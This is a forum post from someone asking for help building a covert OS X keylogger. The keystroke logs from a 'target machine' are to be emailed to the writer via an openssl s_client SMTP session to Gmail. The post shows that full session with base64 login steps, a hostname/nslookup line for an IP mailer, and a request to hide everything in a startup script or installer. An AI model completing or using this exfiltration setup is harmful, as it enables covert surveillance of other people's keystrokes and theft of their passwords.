
OpenSSL + logKext + OS X


casio


Hello Everybody.

Let me just say right off that I am not a mac person.

However, I am trying to program a keylog/IP mailer tied into OS X's kernel.

The logger installed on the target machine is:

code.google.com/p/logkext/

logKext is the best free open source key logger for OS X.

I've set the logKext file to unencrypted for now,

and I'm trying to attach the file in an email via openssl s_client.

Under "334 VXNlcm5hbWU6" is your email "example@gmail.com" converted to base64,

and under "334 UGFzc3dvcmQ6" is your password "examplePASSWORD" converted to base64.

base64 encoder tool here: http://www.motobit.com/util/base64-decoder-encoder.asp

$ openssl s_client -crlf -connect smtp.gmail.com:465
CONNECTED(00000003)
depth=1 /C=US/O=Google Inc/CN=Google Internet Authority
verify error:num=20:unable to get local issuer certificate
verify return:0
---
Certificate chain
0 s:/C=US/ST=California/L=Mountain View/O=Google Inc/CN=smtp.gmail.com
   i:/C=US/O=Google Inc/CN=Google Internet Authority
1 s:/C=US/O=Google Inc/CN=Google Internet Authority
   i:/C=US/O=Equifax/OU=Equifax Secure Certificate Authority
---
Server certificate
subject=/C=US/ST=California/L=Mountain View/O=Google Inc/CN=smtp.gmail.com
issuer=/C=US/O=Google Inc/CN=Google Internet Authority
---
No client certificate CA names sent
---
SSL handshake has read 1711 bytes and written 309 bytes
---
New, TLSv1/SSLv3, Cipher is RC4-MD5
Server public key is 1024 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : TLSv1
    Cipher    : RC4-MD5
    Session-ID: 22C21C4D84A0D9649906F6EB8775B94F44504EA733C3DE62F752C5FB69412649
    Session-ID-ctx:
    Master-Key: 956F05DD954AB363CA629C57CA5B389829D0DF33D1FF5F6E19698AC4FEDF9DA02EE12E15D0835D1B083CB88E20F7F66C
    Key-Arg   : None
    Start Time: 1277702327
    Timeout   : 300 (sec)
    Verify return code: 20 (unable to get local issuer certificate)
---
220 mx.google.com ESMTP h8sm4265622ibk.3
helo
250 mx.google.com at your service
auth login
334 VXNlcm5hbWU6
ZXhhbXBsZUBnbWFpbC5jb20=
334 UGFzc3dvcmQ6
ZXhhbXBsZVBBU1NXT1JE
235 2.7.0 Accepted
mail from:<example@gmail.com>
250 2.1.0 OK h8sm4265622ibk.3
rcpt to:<example@gmail.com>
250 2.1.5 OK h8sm4265622ibk.3
data
354  Go ahead h8sm4265622ibk.3
Subject: test

hello test

.
250 2.0.0 OK 1277702414 h8sm4265622ibk.3

The '.' -period- after the space sends the email.

Have not yet figured out how to add an attachment, which would include the unencrypted logKext file...

I am assuming it will have to be in MIME format or converted to base64?

Also thought it would be easy enough to add an IP mailer to this:

$ hostname | nslookup >> /whatEVERfolderYOUwant/test.txt

Any help at all with how to tie this all together as a startup script or in an installer app would be really helpful.

Preferably this would be tied into the OS X architecture as a startup script or a running perl process or something, and not an AppleScript,

but really any help/suggestions/advice would be greatly appreciated.

Also, bear in mind what I am trying to accomplish here is assuming you have physical access to the machine.
